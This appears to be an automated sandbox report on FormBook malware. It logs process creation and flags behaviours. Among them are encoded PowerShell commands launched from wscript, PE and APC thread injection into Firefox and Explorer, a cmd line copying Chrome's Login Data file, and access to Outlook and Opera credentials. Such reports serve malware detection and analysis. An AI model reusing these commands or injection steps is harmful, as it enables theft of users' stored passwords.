Myelo Dish Accept1 Unpl3 ARBEJDSLSH Anmeldelse SKOVHYTTE prsteskab Publicis8 Umindel4 #sportsma Dkningss4 Deposi1 regningsfu suspe Deba requir Saltstenm1 RDEPANGI #Selvmodsig SUBD kvksfinge Anom thailnde Ondu nonp WINDB
Source: C:\Windows\System32\wscript.exe	Process created: Base64 decoded #Nandinme5 Bobleka Artikuler hotm Formnin4 Vigesimoki6 stom Echinit6 pronativ Pyro Texttv7 Elevatorfr RAMRODSA Qekursuss beanpo Skrk2 polari medeola Lora Raphi6 #defa pied Tandkdsbe Unimmor Badgerb6 exclus Chondrog8 AEROLO FISHERMANI FAGINTEGR Incepto3 Snurl6 Bisexua dosser gavel metafore tran atak Seismi2 Nonfabul Digtek3 REGNSKA Phytome9 Murae Halv8 VOCIFERATE WOODCRAFT hardheart Knib sejt #Immervk8 Sprogfl REDSHI siffleus Super rifters Grouch Proeveti PROTENSI Lydbillede SUBELECTR Rammetchor CISSESAR Bred jordfste Antisens LOXO #Splurgypy7 Septen Dims Tebrevsunc2 Stttep2 likvide Aftvi pantog vejbyg coco ISBRY PASS Pinf munikat unse GULDR Melodiou panimete Raftesoste avancement Enteasubpr MYCE Tidlnnede3 odyssen dryptrren perso #horn Centr4 Henrykkesl8 FORDAMPNIN Intrafol Caldron infr valg SISYRI Genoako skadegrer Underafsni2 Vaccinat drillerier CHAI #Detoxif afmali Hmmetn Alkoholtyp9 linie TAARN mero Spectro8 stjern Positio Autobio utakne Humanhoo3 ompl Bevisfrels3 Brillefode6 EJENDOMS Turistk4 chantant bondesta BILFRAGTER SIDHEPRE #Skident aanderfiau Tallwoo5 vinologist LOYALE Valeri4 lavin Baar9 forventel Nonconv #PERSONNAV idemp start choyainti loxict Hestebre1 Foelebal Mois Lallet Obelisk3 drikk Lanasr #bestraalin STRMPEH VEDL Myelo Dish Accept1 Unpl3 ARBEJDSLSH Anmeldelse SKOVHYTTE prsteskab Publicis8 Umindel4 #sportsma Dkningss4 Deposi1 regningsfu suspe Deba requir Saltstenm1 RDEPANGI #Selvmodsig SUBD kvksfinge Anom thailnde Ondu nonp WINDB			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\chkdsk.exe

Memory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF62D2D0000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Thread register set: target process: 4828			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Thread register set: target process: 4828			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E9C.tmp" "c:\Users\user\AppData\Local\Temp\gkb1wfd4\CSC1FB6CDA7423C41F280B0C76B8C389BB7.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V	Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe	Jump to behavior

Source: explorer.exe, 0000001C.00000000.1713037209.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.2196285943.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.1859640845.0000000001250000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000001C.00000000.1812351909.000000000D42A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1720682575.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.2204978943.00000000048E0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001C.00000000.1713037209.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.2196285943.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.1859640845.0000000001250000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000001C.00000000.2193873777.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1710641976.0000000000B88000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000000.1857434074.0000000000B88000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 0000001C.00000000.1713037209.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.2196285943.0000000001250000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001C.00000000.1859640845.0000000001250000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 13_2_08350420 CreateNamedPipeW,

13_2_08350420

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\chkdsk.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data			Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
